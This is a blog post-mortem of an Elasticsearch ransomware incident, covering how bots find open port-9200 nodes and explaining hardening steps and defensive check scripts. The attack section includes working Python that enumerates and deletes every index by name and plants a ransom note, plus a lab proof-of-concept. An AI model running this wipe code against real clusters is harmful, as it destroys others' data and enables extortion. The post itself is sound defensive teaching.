TechEarl

Elasticsearch Ransomware: How an Open Port Wiped My Database

In May 2026 an automated bot wiped a terabyte of Elasticsearch data on a personal project of mine, through a port I left open. Here is exactly how the ransomware works, why it found me, and the boring one-time fixes that stop it.

Ishan Karunaratne · 22 min read

Most of what I write here is about breaking into things and then closing the holes back up: SQL injection, remote code execution, SSRF, locking down servers, how attackers actually think. I have spent a long time on the offensive side of this, finding these gaps in other people's systems.

Which makes it a particular kind of humbling that in May 2026 a dumb automated bot wiped a terabyte of data off one of my own servers, on a personal project that has nothing to do with this blog, through a port I forgot to close.

No skill was involved. No zero-day, no clever chain, nothing I could even respect. A script swept the internet, found an Elasticsearch node answering on its default port with nobody guarding the door, ran one management command to delete every index, created a new index containing a ransom note, and moved on to the next victim. I was not targeted. I was harvested. This is the Elasticsearch ransomware attack, it happens to thousands of people a year, and this is the full post-mortem: what it does, how it found me, why a "there is a password" assumption did not save me, and the unglamorous one-time fixes that make it impossible.

Elasticsearch ransomware, in one line: an automated bot finds an Elasticsearch node exposed to the internet without authentication, deletes every index through the REST API on port 9200, and creates a read_me index demanding cryptocurrency to restore data it never actually copied. Paying gets you nothing, because there is nothing on the other end to return.

The one-paragraph version

I run a personal project on a fairly large fleet of AWS servers. One of them was a dedicated Elasticsearch box: hundreds of gigabytes of data processed and ingested every day, feeding fast search and retrieval for the front end that consumes it. Over months it had grown to a little over a terabyte, a couple of billion documents spread across many indices. Almost everywhere in that fleet I lock inbound access down to specific IP addresses. On this one box, for reasons I will get to, I had left the data port reachable from the public internet without that restriction. A bot found it, dropped every index, and left me a note. The interesting part is not that it happened. The interesting part is how, and how many independent things had to be wrong at once for a one-line script to win.

How I found out

I did not get an alert from the database. That is the first lesson and I will come back to it. What I got was a part of the website that quietly stopped returning results.

I test my own things constantly, so I noticed quickly that a search-backed section of the site was coming back empty. My first twenty guesses were all wrong, because the one explanation you do not reach for is "the entire database is gone." You check the application. You check the query. You check the network path, the API layer, a bad deploy, a mapping change. The database being empty is so far down the list that it took me a while to even look there.

When I finally queried the cluster directly, the story was obvious and ugly:

bash
# quote the URL so the shell does not try to glob the "?"
curl "http://my-es-host:9200/_cat/indices?v"

Every index I expected was gone. In their place sat a single index I did not create, with a name like read_me (the exact name varies by campaign: read_me, recover_your_data, readme_to_recover). Inside it, one document: a short note with a cryptocurrency wallet address and an email, claiming my data had been "backed up" and would be "restored" once I paid.

It had not been backed up by anyone. In the overwhelming majority of these campaigns there is no copy. The bot deletes first and demands payment second, betting that a fraction of panicked victims will pay on hope alone. Paying only funds the next sweep.

How the attack actually works

There is no finesse here, which is exactly why it scales. The whole thing is four steps, each a plain REST call against an open Elasticsearch HTTP API. Elasticsearch's REST API on port 9200 is the management plane: if you can reach it without credentials, you can read, delete, and create anything.

Here is the entire attack, in the order the bot runs it.

1. Find an open node. The attacker does not even scan. Public scan engines like Shodan and Censys already index every internet-facing service continuously. You query them for Elasticsearch responding on 9200 with no authentication and you get a target list. A node's root endpoint cheerfully tells you what it is:

bash
curl http://target:9200/
# {"name":"node-1","cluster_name":"...","version":{"number":"9.x.x", ...},
#  "tagline":"You Know, for Search"}

If that returns JSON instead of a 401 Unauthorized, the node is unauthenticated and the rest is trivial.

2. List the indices. One call enumerates everything worth destroying:

bash
curl "http://target:9200/_cat/indices?h=index"

3. Delete the data. This is the step people get wrong when they describe the attack. Modern Elasticsearch will refuse a wildcard delete by default (more on that below), so the bot does not bother with DELETE /*. It deletes each index by name, in a loop. Here is the core of it, written plainly:

python
import requests

TARGET = "http://localhost:9200"   # lab target only, see the disclaimer

def wipe(base):
    names = requests.get(f"{base}/_cat/indices?h=index").text.split()
    for name in names:
        requests.delete(f"{base}/{name}")
    return names

Deleting by name sidesteps every "no wildcard deletes" safety setting in one move. That is the whole trick, and it is why that setting is a speed bump and not a wall.

4. Drop the ransom note. Finally it creates a new index and writes a single document so you cannot miss it:

python
def ransom_note(base):
    note = {
        "message": "All your data has been backed up. To restore, send "
                   "0.05 BTC to <wallet> and email <address> with your IP.",
        "warning": "If you do not pay within 48 hours your data is gone.",
    }
    requests.put(f"{base}/read_me", json={})
    requests.post(f"{base}/read_me/_doc", json=note)

That is the entire ransomware. Find, list, delete by name, write note. No human in the loop, no persistence, no lateral movement. The bot never needed to be good. It needed me to be reachable, and I was.

I have a working version of this wired up against a deliberately exposed lab so you can watch it happen end to end, safely, on your own machine. That is at the end of the article. Run it against anything you do not own and you are committing a crime, so do not.

"But there was a password": how an unauthenticated node still happens

Here is the part that stung, and the part most people get wrong about their own setups.

Since Elasticsearch 8.0 (February 2022), security is on by default. A normally installed node generates passwords and TLS certificates on first start, and the HTTP API answers 401 until you authenticate. I was on Elasticsearch 9. So how did an automated bot, which absolutely does not crack passwords, get a fully unauthenticated management API?

The honest answer is the useful one: a bot wiping your cluster is proof the HTTP layer was answering without credentials, regardless of what you believe you configured. Bots do not brute-force Elasticsearch. They hit nodes that respond to anonymous requests. So one of these was true on my box, and they are the same handful of things that are true on most "but I had a password" stories:

  • Security was disabled on that node. The single most common cause. Somewhere in the setup, xpack.security.enabled: false got set, often to "make development easier" or because the node was "only ever going to be internal." Once that flag is off, the REST API has no authentication at all, no matter how strong the password you set elsewhere.
  • The password protected the wrong layer. Elasticsearch has a transport layer (node to node) and an HTTP layer (clients to the REST API). It is entirely possible to have credentials in play for one path while the HTTP API in front of 9200 still answers anonymously, especially in hand-rolled Docker configurations carried forward from an older, pre-8.0 mental model.
  • A reverse-proxy assumption. People put auth on a proxy and assume the node behind it is unreachable, then expose the node directly by accident. The proxy has a password. The node does not.
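The first cause in that list is the easiest one to check mechanically. A minimal sketch, assuming the flag lives either in a flat elasticsearch.yml or in a Docker Compose environment list. The function name and the sample strings are illustrative, and the function only looks for an explicit "false". It cannot tell you that security is actually enforced.

```python
import re

# Matches "xpack.security.enabled: false" (elasticsearch.yml)
# and "xpack.security.enabled=false" (Compose environment entry).
_FLAG = re.compile(r"xpack\.security\.enabled\s*[:=]\s*['\"]?(\w+)", re.IGNORECASE)


def security_explicitly_disabled(config_text: str) -> bool:
    """Return True if any non-comment line switches security off."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0]          # ignore trailing and full-line comments
        match = _FLAG.search(line)
        if match and match.group(1).lower() == "false":
            return True
    return False


# Hypothetical config fragments for illustration.
yml = "cluster.name: demo\nxpack.security.enabled: false\n"
compose_env = "environment:\n  - xpack.security.enabled=false\n"
print(security_explicitly_disabled(yml), security_explicitly_disabled(compose_env))
```

A True here is a definite finding. A False only means this particular slip was not found in the text you fed it, so the anonymous request against the live node is still the real test.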

The uncomfortable truth in my case is that I could not reconstruct the exact mechanism with certainty, because the node was not logging anonymous API access in a way I was collecting and alerting on. "I do not know precisely which slip left the API answering anonymously" is itself a finding: if I had been logging access to the data tier, I would know. The takeaway is not "Elasticsearch is insecure" (9.x is secure by default and the Elastic team has done good work here). The takeaway is that an exposed port plus any one configuration slip equals an unauthenticated database, and you should assume that slip will happen.

The other thing worth saying plainly: before 8.0, an out-of-the-box self-hosted Elasticsearch genuinely was open with no authentication on the free tier. A huge number of the deployment guides, Docker images, and habits people still use today were written in that era. That is why this attack refuses to die even though the current defaults are good. The defaults changed; a decade of muscle memory did not.

The wildcard-delete guard, and why it did not help

Elasticsearch has a cluster setting that refuses destructive operations against wildcard or _all patterns:

json
PUT /_cluster/settings
{ "persistent": { "action.destructive_requires_name": true } }

Here is the part that trips most people up: this setting has defaulted to true since Elasticsearch 8.0. A DELETE /* or DELETE /_all is rejected out of the box. So it was almost certainly already on when I got hit, and it did nothing, because the bot never issues a wildcard delete. It enumerates index names and deletes them one at a time, which the guard does not touch.

Keep the setting on. It stops the most common accidental DELETE /* from a tired engineer at 2am, which is a real and valuable thing. Just do not file it under "this protects me from ransomware," because it does not. The only thing that protects you from the ransomware is the bot never reaching the API in the first place.
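To make the reasoning concrete, here is a small sketch in two parts. The first function resolves the effective value of the setting from a parsed response to GET /_cluster/settings?include_defaults=true&flat_settings=true. The second is a deliberately simplified model of the guard, not Elasticsearch's actual implementation. The function names and index names are made up for illustration.

```python
def effective_setting(settings: dict, key: str):
    """Resolve one flat cluster setting: transient beats persistent beats defaults."""
    for scope in ("transient", "persistent", "defaults"):
        value = settings.get(scope, {}).get(key)
        if value is not None:
            return value
    return None


def guard_rejects(delete_target: str) -> bool:
    """Simplified model of the guard: refuse wildcard or _all targets."""
    return any("*" in part or part == "_all" for part in delete_target.split(","))


# Hypothetical index names, as a bot would read them from _cat/indices.
names = ["products", "orders-2026.05"]

# Every target the bot sends is an explicit name, so the guard never fires.
blocked = [name for name in names if guard_rejects(name)]
print(guard_rejects("*"), guard_rejects("_all"), blocked)
```

The empty blocked list is the whole point: a loop over explicit names never gives the guard a pattern to refuse.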

Why this class of attack is so successful

It helps to internalize that you are not interesting to these people. You are a row in a list a machine generated.

There is a mature, fully automated ecosystem that does nothing but scan the internet for exposed data stores: Elasticsearch, MongoDB, Redis, Kafka, ClickHouse, and friends. A 2024 IEEE study built exactly this kind of reconnaissance engine and ran it across 29 million IP addresses over a full year. Among the databases it catalogued, roughly 40% of the Elasticsearch instances it found had no authentication at all. Forty percent. The same study tracked the ransomware signature directly, looking for Elasticsearch indices named read-me or read_me, and watched the count of infected nodes climb through late 2022 and into 2023. It was not measuring rare events. It was measuring a steady harvest.

The economics are completely one-sided:

  • Scanning is free and continuous. The whole address space gets swept constantly, by attackers and researchers alike. Fresh exposures are found in hours, not weeks.
  • The attack is a script. Connect, list, delete, write note. It costs the operator almost nothing to hit ten thousand servers in a day.
  • Deleting is cheaper than stealing. Exfiltrating a couple of billion documents is slow and bandwidth-heavy. Deleting them and claiming you have a copy is instant. The Meow attack took this to its logical conclusion and skipped the ransom note entirely, just destroying exposed databases for nothing.
  • A few payments fund everything. Most victims never pay. A handful do. At this scale, a handful is profit.

So "why did it work" has a blunt answer: it worked because it is cheap and automatic and I presented an unauthenticated, internet-reachable database. The attack did not need to defeat my defenses. It walked through a gap where a defense should have been.

The part that actually hurt: the backups

I take backups seriously. This is the bit that genuinely made me sad, because I did everything I tell other people to do and still nearly lost everything.

I keep multiple, independent forms of backup. I keep the raw source data that feeds the pipeline, stored separately. And I take daily AWS snapshots of the servers. Belt and suspenders. So when I saw the indices were gone, I was annoyed but calm: I would restore from a snapshot and re-ingest the delta. A bad morning, not a disaster.

Then I went to the snapshots and found that, for reasons specific to how that volume was configured, the snapshot had been excluding the Elasticsearch data the whole time. There was no database snapshot to restore. The one machine where I needed it, the backup I was certain I had, was the backup that was not there.

So I fell back to the raw source data, to rebuild the cluster from scratch by re-running months of ingestion. And in a few places, even the raw data was incomplete. Not catastrophic, the gaps did not matter much in the end, but the pattern was clear: everything that could go a little bit more wrong, did. A terabyte-plus index built up over months had to be rebuilt the slow way, and it took me roughly two to three weeks of grinding re-ingestion to get back to where I was.

The lesson is not "take backups." Everyone says that. The lesson is sharper: a backup you have never restored from is a hypothesis, not a backup. I had multiple layers of backup and the one that mattered for this exact failure was silently broken, and I only found out at the worst possible moment. Test your restores. Actually run them. The snapshot you have never restored is a guess wearing a backup's clothes.

The rebuild: what "hardened" actually means

I did not patch the old box. I treated it as burned, stood up a clean node on different infrastructure, and brought the lessons across as concrete settings. Here is the playbook in the order that matters, because the order is the point: the first item does ninety percent of the work.

1. Bind the database to loopback, full stop

The data port binds to 127.0.0.1 and nothing else. It is not reachable from any network interface. If you run Elasticsearch in Docker, this is the single most important line in your whole setup:

yaml
ports:
  - "127.0.0.1:9200:9200"   # loopback only, never "9200:9200"

The shorthand 9200:9200 binds to 0.0.0.0, every interface, including the public one. Ten extra characters (127.0.0.1:) is the difference between "reachable only from this host" and "reachable from the entire internet." If I had written those characters originally, there would be no article.
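This is easy to lint for. A minimal sketch, assuming Compose short-syntax port strings and Docker's default of publishing on all interfaces when no host IP is given. The function names are illustrative, and the long-form Compose syntax is not handled.

```python
import ipaddress


def published_host_ip(mapping: str) -> str:
    """Return the host IP a Compose short-syntax port mapping binds to."""
    spec = mapping.split("/", 1)[0]          # drop a trailing /tcp or /udp
    if spec.startswith("["):                 # bracketed IPv6, e.g. [::1]:9200:9200
        return spec[1:spec.index("]")]
    parts = spec.split(":")
    if len(parts) == 3:                      # HOST_IP:HOST_PORT:CONTAINER_PORT
        return parts[0]
    return "0.0.0.0"                         # no host IP given: all interfaces


def is_loopback_only(mapping: str) -> bool:
    """True only when the mapping publishes on a loopback address."""
    return ipaddress.ip_address(published_host_ip(mapping)).is_loopback


for mapping in ("127.0.0.1:9200:9200", "9200:9200", "[::1]:9200:9200"):
    print(mapping, "->", "loopback only" if is_loopback_only(mapping) else "PUBLIC")
```

Run over every ports entry in a compose file, a check like this turns the missing prefix into a failing lint step instead of something you notice after a scan.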

2. Know that Docker can punch through your firewall

This is the trap that catches careful people, so it gets its own section. If you publish a container port, Docker writes its own NAT and forwarding rules directly into iptables, and traffic to a published port is matched by those rules before it ever reaches the rules that UFW and firewalld manage. You can have a default-deny host firewall, run ufw status, see a tidy locked-down policy, and still have a published container port wide open to the world underneath it. Your firewall status output is lying to you, not on purpose, but because it does not see Docker's rules.

This single behavior is behind a huge share of "but I had a firewall" database breaches. The loopback bind in step 1 is what actually protects you, because a port bound to 127.0.0.1 is not reachable regardless of what Docker did to iptables. If you genuinely must let Docker publish to a public interface, you manage the DOCKER-USER chain explicitly rather than trusting that UFW covers it. Do not trust the firewall to be your first line here. Trust the bind.
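"Trust the bind" can be checked from the host itself. A rough sketch that reads the text output of ss -tln and reports any listener on the data port that is not bound to loopback. It assumes the usual column layout, where the local address is the fourth field, and the function name is illustrative. Depending on how Docker is configured, a published port may not appear in ss at all, so an empty result is not proof of safety. The off-box curl remains the real test.

```python
import ipaddress


def public_listeners(ss_output: str, port: int) -> list:
    """Return local addresses listening on `port` that are not loopback."""
    exposed = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue                                   # header or non-listening row
        host, _, listen_port = fields[3].rpartition(":")
        if listen_port != str(port):
            continue
        host = host.strip("[]").split("%", 1)[0]       # drop IPv6 brackets and %iface
        if host == "*" or not ipaddress.ip_address(host).is_loopback:
            exposed.append(fields[3])
    return exposed


# Sample output for illustration; on a real host, capture `ss -tln` instead.
sample = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      4096   0.0.0.0:9200       0.0.0.0:*
LISTEN 0      4096   127.0.0.1:9300     0.0.0.0:*
LISTEN 0      4096   [::]:9200          [::]:*
"""
print(public_listeners(sample, 9200))
```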

3. Reach the database only through a tunnel, never an open port

My original sin was leaving a port open so I could occasionally reach the box from my home machine. The correct version of that convenience is an authenticated tunnel: a VPN, an SSH tunnel, or an outbound-initiated tunnel like a Cloudflare Tunnel. In every case the database never listens on a public port at all. With an outbound-initiated tunnel, access flows back through a connection the server itself makes, so a scanner sweeping the IP finds nothing listening. There is no open inbound door to find.

If you absolutely must talk to a data store over the public internet, then at the very least restrict the port to specific source IP addresses and block everything else, which is exactly the control I apply everywhere and somehow missed on this one box. An IP allowlist is the weakest of these options (IPs change, and it is one config slip from open), but it is infinitely better than nothing. A VPN or tunnel is the right answer.
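Because an allowlist is one slip from open, it is worth auditing for that slip. A minimal sketch, assuming inbound rules have been exported into a simple list of dictionaries. The from_port, to_port and cidr keys are a hypothetical shape chosen for this example, not any cloud provider's actual format.

```python
import ipaddress


def world_open_rules(rules, port=9200):
    """Return the rules that expose `port` to every address (a /0 network)."""
    flagged = []
    for rule in rules:
        covers_port = rule["from_port"] <= port <= rule["to_port"]
        network = ipaddress.ip_network(rule["cidr"], strict=False)
        if covers_port and network.prefixlen == 0:     # 0.0.0.0/0 or ::/0
            flagged.append(rule)
    return flagged


# Hypothetical rule set using documentation-range addresses.
rules = [
    {"from_port": 9200, "to_port": 9200, "cidr": "0.0.0.0/0"},
    {"from_port": 9200, "to_port": 9200, "cidr": "203.0.113.7/32"},
    {"from_port": 22, "to_port": 22, "cidr": "0.0.0.0/0"},
    {"from_port": 9000, "to_port": 9300, "cidr": "::/0"},
]
for rule in world_open_rules(rules):
    print("world-open on 9200:", rule)
```

Port ranges are checked as well as exact matches, since a broad range that happens to include 9200 is the kind of rule that is easy to miss by eye.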

4. Authenticate the database itself, and assume the perimeter will fail

Even on a loopback-only port behind a tunnel, the data plane requires credentials and TLS. This is the "assume one layer fails someday" tier. Defense in depth means the database does not trust its network position to be the only thing standing between an attacker and the data. On 9.x this is the default; do not turn it off, and verify it is actually enforced on the HTTP layer by hitting the API without credentials and confirming you get a 401.
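The "hit it without credentials" check is small enough to script and run on a schedule. A minimal sketch using only the standard library. The function names are illustrative, and it should only ever be pointed at a node you own. If the HTTP layer uses TLS with a certificate your machine does not trust, the request will fail before any status code comes back and is reported as unreachable, which is inconclusive rather than safe.

```python
import urllib.error
import urllib.request


def classify_anonymous_status(status: int) -> str:
    """Interpret the HTTP status of a request sent with no credentials."""
    if status in (401, 403):
        return "auth enforced"
    if 200 <= status < 300:
        return "EXPOSED: answered without credentials"
    return f"inconclusive (HTTP {status})"


def probe(base_url: str, timeout: float = 5.0) -> str:
    """Send one unauthenticated GET to the root endpoint of a node you own."""
    try:
        with urllib.request.urlopen(base_url, timeout=timeout) as resp:
            return classify_anonymous_status(resp.status)
    except urllib.error.HTTPError as err:      # 4xx/5xx arrive as exceptions
        return classify_anonymous_status(err.code)
    except OSError as err:                     # refused, timed out, TLS failure
        return f"unreachable: {err}"


if __name__ == "__main__":
    print(probe("http://localhost:9200/"))
```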

5. Keep the destructive guard on (but know its limits)

json
PUT /_cluster/settings
{ "persistent": { "action.destructive_requires_name": true } }

It is the default and it should stay on. It stops accidental wildcard deletes. It will not stop a bot that deletes by name, so it is hygiene, not a control you rely on.

6. Harden the host and back up like you will need it

SSH key-only with passwords disabled, fail2ban on SSH, and then backups done properly: native Elasticsearch snapshots to object storage on a schedule with retention, a separate copy of the raw source data, and crucially, a restore you have actually performed at least once. Verify the snapshot policy includes the data you think it includes. I cannot stress this enough given how my own backups let me down: open the snapshot, list what is in it, restore it somewhere throwaway, confirm the documents are there.
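"List what is in it" can be partly automated. A sketch that takes the parsed JSON from Elasticsearch's get-snapshot API (GET /_snapshot/<repository>/<snapshot>) and reports which indices you expected are not covered by any successful snapshot. The index and snapshot names are hypothetical. Passing this check shows the snapshot claims to contain an index, which is still weaker than a restore you have actually run.

```python
def missing_from_snapshot(snapshot_info: dict, expected: set) -> set:
    """Return expected indices absent from every successful snapshot."""
    covered = set()
    for snap in snapshot_info.get("snapshots", []):
        if snap.get("state") == "SUCCESS":     # ignore failed or partial runs
            covered.update(snap.get("indices", []))
    return expected - covered


# Hypothetical response body, trimmed to the fields used here.
info = {
    "snapshots": [
        {"snapshot": "nightly-1", "state": "SUCCESS", "indices": ["products"]},
        {"snapshot": "nightly-2", "state": "FAILED", "indices": ["orders"]},
    ]
}
print(missing_from_snapshot(info, {"products", "orders"}))
```

In this sample the orders index only appears in a failed snapshot, so it is reported as missing. That is the same category of surprise as a snapshot that silently excluded the data volume.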

7. Alert on the database, not on the symptom

I found out my cluster was empty because a user-facing page went blank. That means the attacker had the run of the box for an unknown window before anything flagged it. The rebuild added a health check and alert directly on the data tier: document counts, index presence, a heartbeat. If the cluster goes sideways, I get paged, instead of finding out through broken output days later.
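A data-tier check of this kind can be sketched in a few lines. The function below takes the rows returned by _cat/indices?format=json and a table of indices you expect, each with a minimum document count. The index names and thresholds are hypothetical, and fetching the rows and wiring the result to a pager are left out.

```python
def data_tier_alerts(cat_rows, expected_min_docs):
    """Compare observed indices against expected names and document floors."""
    # docs.count arrives as a string and can be null for closed indices.
    seen = {row["index"]: int(row.get("docs.count") or 0) for row in cat_rows}
    alerts = []
    for name, floor in expected_min_docs.items():
        if name not in seen:
            alerts.append(f"MISSING index: {name}")
        elif seen[name] < floor:
            alerts.append(f"LOW doc count: {name} has {seen[name]}, expected >= {floor}")
    return alerts


# Hypothetical post-attack state: real indices gone or shrunken, a note left behind.
rows = [
    {"index": "products", "docs.count": "10"},
    {"index": "read_me", "docs.count": "1"},
]
for alert in data_tier_alerts(rows, {"products": 100, "orders": 1}):
    print(alert)
```

Checking for expected indices by name matters here, because a wiped cluster that contains only a ransom note still answers health checks cheerfully.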

Are you exposed right now? Check in five minutes

If you run a self-hosted data store, do these today.

  • Look yourself up on Shodan or Censys. Search for your server's IP. If your database shows up, the entire internet can already see it. This is the fastest reality check there is.
  • List your indices from off the box. From a machine that is not the server, run curl http://your-host:9200/_cat/indices. If you get a response without credentials, you are exposed and unauthenticated, which is the exact precondition for this attack. If you get a 401, good.
  • Check what your container is actually bound to. Run ss -tlnp or docker ps and read the port mapping. 0.0.0.0:9200->9200 or :::9200->9200 is public. 127.0.0.1:9200->9200 is safe. Do not trust your firewall's status to tell you this. Check the bind directly.
  • Look for a ransom index. Run curl http://localhost:9200/_cat/indices?v and scan for anything named read_me, recover, warning, or similar that you did not create. If it is there, you are already past the "if" stage. See the Meow attack write-up too, since the same exposure gets hit by data-wiping bots that leave no note at all.
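The last check in that list is easy to automate against a list of index names. A small sketch that flags names matching the patterns mentioned in this article and not on your own known-good list. The pattern is a heuristic built from those few names, the function name is illustrative, and a campaign can pick any name it likes, so treat a clean result as weak evidence only.

```python
import re

# Names seen in this article: read_me, read-me, readme_to_recover,
# recover_your_data, and "warning"-style notes.
RANSOM_HINTS = re.compile(r"read[-_]?me|recover|warning", re.IGNORECASE)


def suspicious_indices(names, known):
    """Return index names that look like ransom notes and are not yours."""
    return sorted(n for n in names if n not in known and RANSOM_HINTS.search(n))


# Hypothetical cluster contents and known-good list.
observed = ["products", "read_me", "readme_to_recover", "warnings-archive"]
mine = {"products", "warnings-archive"}
print(suspicious_indices(observed, mine))
```

Keeping an explicit known-good set avoids false alarms on legitimate indices that happen to contain one of the trigger words.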

Try it safely: the lab

Reading about it is one thing. Watching a script delete a seeded cluster and drop a note in under a second is what makes it stick. I built a self-contained lab in the techearl-labs repo: an Elasticsearch target seeded with realistic indices, bound to loopback, plus the ransomware proof of concept above.

bash
git clone https://github.com/ishankaru/techearl-labs
cd techearl-labs
docker compose up exposed-elasticsearch
# in another shell, seed it then run the PoC against localhost only
./exposed-elasticsearch/seed.sh
python3 exposed-elasticsearch/ransomware/ransom.py http://localhost:9200

The target binds to 127.0.0.1 and the PoC refuses any host that is not loopback, on purpose. The README spells out the safety rules. The point is to see your own indices vanish in a controlled place, then walk the hardening above and watch the same script bounce off a 401.

The lessons, distilled

  1. "I have a firewall" is not "the port is closed." Docker publishes past host firewalls. Verify the actual bind every time. The loopback bind is the real control.
  2. An unauthenticated database is a public database the moment one network control slips. Authenticate the data plane and confirm the HTTP layer enforces it. The perimeter will fail eventually; the database should still say no.
  3. action.destructive_requires_name is hygiene, not armour. It blocks accidental wildcard deletes, not a bot that deletes by name.
  4. You are not too small to be hit. There is no targeting. Automated harvesters sweep the whole internet continuously and find fresh exposures in hours. Obscurity is not a control.
  5. A backup you have never restored is a guess. Verify what your snapshots actually contain. The one time you need it is the worst time to learn it was broken.
  6. Alert on the asset, not the symptom. If you find out your database is gone because users complain, your detection lives in the wrong place.
  7. Never pay. The data is almost never recoverable from the attacker. Paying funds the next sweep and returns nothing.

None of this was sophisticated. I was breached by a script that has hit hundreds of thousands of servers, using the exact playbook it always uses, because I left the exact door open it always looks for. The flip side is the good news: every single root cause has a known, boring, one-time fix. Doing them before the scan finds you is the entire game. The elite end of this industry gets breached too; the sites you would assume are untouchable have all had their day. Security is only ever true for today. Tomorrow there is a new gap, and the work is noticing it before a machine does.


Ishan Karunaratne

Software Systems Architect · Senior Software Engineer · Engineering Leadership

Software systems architect and senior software engineer with more than two decades designing, building, and running production software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Now a CTO, though what I write here is drawn from the full arc of that work, across architecture, engineering, and operations, not any single job.
